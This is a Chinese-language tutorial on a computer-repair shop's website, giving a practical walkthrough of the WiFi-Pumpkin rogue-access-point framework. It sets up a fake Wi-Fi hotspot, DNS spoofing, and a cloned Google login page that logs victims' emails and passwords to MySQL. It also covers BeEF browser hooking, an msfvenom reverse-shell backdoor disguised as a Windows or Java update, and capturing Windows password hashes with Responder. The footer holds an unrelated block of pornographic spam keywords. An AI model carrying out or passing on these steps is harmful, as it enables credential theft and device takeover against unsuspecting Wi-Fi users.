錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務,錦州廣廈維修電腦,公司IT外包服務
topFlag1 設為首頁
topFlag3 收藏本站
 
maojin003 首 頁 公司介紹 服務項目 服務報價 維修流程 IT外包服務 服務器維護 技術文章 常見故障
錦州市廣廈電腦維修|上門維修電腦|上門做系統(tǒng)|0416-3905144熱誠服務技術文章
WiFi-Pumpkin無線滲透測試框架實戰(zhàn)教程

作者: 佚名  日期:2017-06-28 16:37:40   來源: 本站整理

 描述
WiFi-Pumpkin是一款專用于無線環(huán)境滲透測試的完整框架,利用該工具可以偽造接入點完成中間人攻擊,同時也支持一些其他的無線滲透測試功能。旨在提供更安全的無線網(wǎng)絡服務,該工具可以用來監(jiān)聽目標的流量數(shù)據(jù),通過無線釣魚的方式來捕獲不知情的用戶,以此來達到監(jiān)控目標用戶數(shù)據(jù)流量的目的。
主要功能
Rouge WiFi Access Point
Deauth Attack Clients AP
Probe Request Monitor
DHCP Starvation Attack
Credentials Monitor
Transparent Proxy
Windows Update Attack
Phishing Manager
Partial Bypass HSTS protocol
Support beef hook
ARP Poison
DNS Spoof
Patch Binaries via MITM
Karma Attack (supporthostapd-mana)
LLMNR,NBT-NS and MDNSpoisoner(Responder)
Pumpkin-Proxy(ProxyServer(mitmproxyAPI))
Capture images on the fly
TCP-Proxy(with scapy)
插件
Plugin
Description
Dns2proxy
This tools offer a deffierent features for post-explotation once you change the DNS server to a Victim.
Sslstrip2
Sslstrip is a MITM tool that implements Moxie Marlinspike’s SSL stripping attacks based version fork
Sergio-proxy
Sergio Proxy(a Super Effective Recorder of Gathered inputs and Outputs) is an HTTP proxy that was written in Python for the Twisted framework.
BDFProxy-ng
Patch Binaries via MITM: BackdoorFactory + mitmProxy, bdfproxy-ng is a fork and review of the original BDFProxy.
Responder
Responder an LLMNR, NBT-NS and MDNS poisoner.
Transparent Proxy:
TransparentProxy可以允許用戶攔截/修改流量信息,同時可以實現(xiàn)目標頁面的javascripts注入,也可以輕松實現(xiàn)模塊化注入并創(chuàng)建一個Python文件(plugins/extension/目錄下),最后在PumpProxy(標簽)下顯示信息。

TCP-Proxy Server
在TCP stream中你可以設置一個代理。它可以通過scapy模塊過濾請求和響應流并且主動修改TCP protocol的數(shù)據(jù)包來獲得攔截。這插件使用模塊來view或者modify這攔截數(shù)據(jù),僅僅加你的自定義模塊在”plugins/analyzers/”,自動被列舉在TCP-Proxy標簽。
安裝WiFi-Pumpkin
git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git
pip install –r requirements.txt
./installer.sh –install
運行WiFi-Pumpkin:python wifi-pumpkin.py
創(chuàng)建釣魚頁面
設置MYSQL
/etc/init.d/mysql start
Mysql –u root
Create database xeus;
Use xeus;
Create table logins(networkvarchar(64), email varchar(64), password varchar(64));

下載Fake Page
git clone https://github.com/XeusHack/Fake-Login-Page.git
將Fake-Login-Page文件放到/var/www目錄下。
編輯database.php文件,設置文件內容:
$username = “root”;
$password = “”;
$db_name = “xeus”;
$tbl_name = “logins”;
這里設置的內容根據(jù)自己的環(huán)境而設定,我這里是我的環(huán)境。
重啟mysql:/etc/init.d/mysql restart
設置WiFi-Pumpkin
運行WiFi-Pumpkin,進入此目錄下,python WiFi-Pumpkin.py

 切換到Settings命令,可以設置SSID號,我這里直接選擇默認的PumpAP,信道號為11,這里我選擇了Enable Wireless Security,密碼為1234567890等。注意:這里NetworkAdapter是無線網(wǎng)卡的名稱,需要買一個無線網(wǎng)卡。

   然后往下拉,可以看到默認設置dhcp服務設置的信息,這里保持默認就行。
取消代理,在旁邊Plugins點擊,然后取消proxy server,如圖所示。

點擊Start,然后可以在手機上可以看到SSID為PumpAP的無線熱點。可以看到是加密狀態(tài),輸入設置的密碼;1234567890,就可以連接上。

然后點擊Modules選項下的DNS Spoofer,進入頁面,以DNSSpoof默認域名example.com為例,點擊Start Attack。使DNS SpoofRunning…

選擇PhishingManager模塊,選擇Options里面的index.html,點擊StartServer。然后在手機客戶端連接上PumpAP無線熱點后,輸入example.com域名后,出現(xiàn)了設置的信息。
然后選擇SetDirectory,如圖所示,將上面設置的Fake-Login-Page路徑設置到SetEnv PATH里面,然后點擊StartServer。可以看到在手機客戶端里面出現(xiàn)的相關偽造的頁面。

在上面的偽造google頁面輸入郵箱和密碼之后,然后進入mysql的logins表中,可以看到相關的信息。

Beef配合攻擊
在/usr/share/beef-xss目錄下運行./beef。如圖所示。選擇其中的Hook URL。

然后http://127.0.0.1:3000/ui/authentication登陸beef,默認賬號和密碼都是beef。
按照上面設置PumpAP無線熱點過程,進入到Phishing Manager模塊,選中按照如圖所示進行設置。

然后點擊StartServer運行,然后在手機客戶端連接上PumpAP無線熱點,然后打開example.com域名。在beef頁面會出現(xiàn)受攻擊的機器。然后可以通過beef進入深入攻擊了。

反彈shell
生成一個shellcode后門,利用msfvenom命令:mefvenom –pwindows/meterpreter/reverse_tcp lhost=你的本機IP地址 lport=4444 –f exe –o windowsupdate.exe進入msfconsole界面,等待shell連接。

按照設置WiFi-Pumokin,進入DNS Spoofer界面,然后刪除DNS:spoof;里面的example.com,然后自己填入一個域名(我這里依然選擇example.com),這里注意一定要刪除之前的example.com,要不會占用一個端口,后面操作不會成功的。

在DNS spoofer頁面選擇Fake Update,進入此頁面,然后將自己生產的shellcode后門加入該路徑,這里可以選擇WindowsUpdate或者Java Update更新,Network Adapter要選擇wlan0,自己的無線網(wǎng)卡。

然后在目標機器連接到我的偽造的PumpAP無線熱點,輸入example.com域名。可以進入上面選擇的偽造頁面。

javaUpdate頁面如下圖所示。

如果被攻擊者電腦下載了我們的后門,安裝了后門。那么我們就可以在kali里面獲取它的電腦權限。

Stealing Accouts Password Hashes
運行WiFi-Pumpkin程序,在界面上Advanced Mode:Monitor MITM Attack選擇Responder。如圖所示。

然后在Plugins選擇Responder,并且關閉Enable proxy server.可以在change打開配置頁面。(一般默認就好,也可以根據(jù)自己想要抓取的選擇開啟和關閉),如圖所示。


我們主要的目的是抓取windows的賬號和密碼,在目標機器上運行此操作,就會在wifi-pumpkin的responder顯示出目標機的用戶名和hash密碼。

 

總結:

上面的主要是參考部分文章然后自己來驗證的,參考文章如下:



熱門文章
  • 機械革命S1 PRO-02 開機不顯示 黑...
  • 聯(lián)想ThinkPad NM-C641上電掉電點不...
  • 三星一體激光打印機SCX-4521F維修...
  • 通過串口命令查看EMMC擦寫次數(shù)和判...
  • IIS 8 開啟 GZIP壓縮來減少網(wǎng)絡請求...
  • 索尼kd-49x7500e背光一半暗且閃爍 ...
  • 樓宇對講門禁讀卡異常維修,讀卡芯...
  • 新款海信電視機始終停留在開機界面...
  • 常見打印機清零步驟
  • 安裝驅動時提示不包含數(shù)字簽名的解...
  • 共享打印機需要密碼的解決方法
  • 圖解Windows 7系統(tǒng)快速共享打印機的...
  • 錦州廣廈電腦上門維修

    報修電話:13840665804  QQ:174984393 (聯(lián)系人:毛先生)   
    E-Mail:174984393@qq.com
    維修中心地址:錦州廣廈電腦城
    ICP備案/許可證號:遼ICP備2023002984號-1
    上門服務區(qū)域: 遼寧錦州市區(qū)
    主要業(yè)務: 修電腦,電腦修理,電腦維護,上門維修電腦,黑屏藍屏死機故障排除,無線上網(wǎng)設置,IT服務外包,局域網(wǎng)組建,ADSL共享上網(wǎng),路由器設置,數(shù)據(jù)恢復,密碼破解,光盤刻錄制作等服務

    技術支持:微軟等
    主站蜘蛛池模板: 精品国产性色无码AV网站| 国产成年无码v片在线| 亚洲AV无码一区二区二三区入口| 一本大道东京热无码一区| 无码日韩精品一区二区免费暖暖 | 欧洲Av无码放荡人妇网站| 99久久无码一区人妻a黑| 精品无码久久久久久久动漫 | 在线观看无码不卡AV| 自拍中文精品无码| 青青爽无码视频在线观看| 免费无码成人AV在线播放不卡| 无码人妻少妇伦在线电影| 中文字幕无码高清晰| 亚洲AV无码一区二区二三区软件 | 男男AV纯肉无码免费播放无码| 亚洲日韩乱码中文无码蜜桃臀网站 | 亚洲中文字幕无码中文字在线 | 国产成人无码综合亚洲日韩| 丰满爆乳无码一区二区三区| 曰产无码久久久久久精品| 亚洲国产精品无码一线岛国| 亚洲精品无码av天堂| 国产精品无码一本二本三本色| 精品无码AV无码免费专区| 日韩人妻无码精品久久久不卡 | 亚洲自偷自偷偷色无码中文 | 中文字幕久久精品无码| 国产免费黄色无码视频| yy111111电影院少妇影院无码| 2020无码专区人妻系列日韩| 亚洲aⅴ无码专区在线观看春色| 久久亚洲精品成人av无码网站| 无码性午夜视频在线观看| 亚洲国产精品无码久久久秋霞2| 中文字幕av无码一区二区三区电影 | 久久久久亚洲AV无码麻豆| 久久亚洲AV成人出白浆无码国产| 久久久久亚洲AV无码麻豆| 亚洲乱人伦中文字幕无码| 精品人妻系列无码人妻漫画|